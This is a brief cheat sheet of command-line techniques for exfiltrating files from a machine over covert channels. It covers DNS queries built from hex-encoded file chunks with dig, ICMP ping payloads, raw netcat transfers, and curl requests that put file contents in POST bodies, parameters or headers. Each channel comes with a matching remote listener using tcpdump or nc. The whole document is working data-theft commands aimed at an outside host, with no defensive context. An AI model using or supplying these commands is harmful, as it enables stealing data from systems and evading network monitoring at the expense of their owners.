# Covert channels for data exfiltration

DNS

local# xxd -p -c 16 $file | while read line; do dig @$remote $line. +time=1 +retry=0 & done
remote# tcpdump -ni any -Xs 0 "host $remote and udp dst port 53"

ICMP

local# xxd -p -c 32 $file | while read line; do ping -p $line -c 1 $remote; done
remote# tcpdump -ni any -Xs 0 'host $remote icmp'

Raw

local# nc $remote $port < $file
remote# nc -l -p $port

HTTP/S

local# curl --data "@$file" http://$remote:$port
local# curl --data "param=`cat $file`" http://$remote:$port
local# curl --header "header=`cat $file`" http://$remote:$port
remote# nc -l -p $port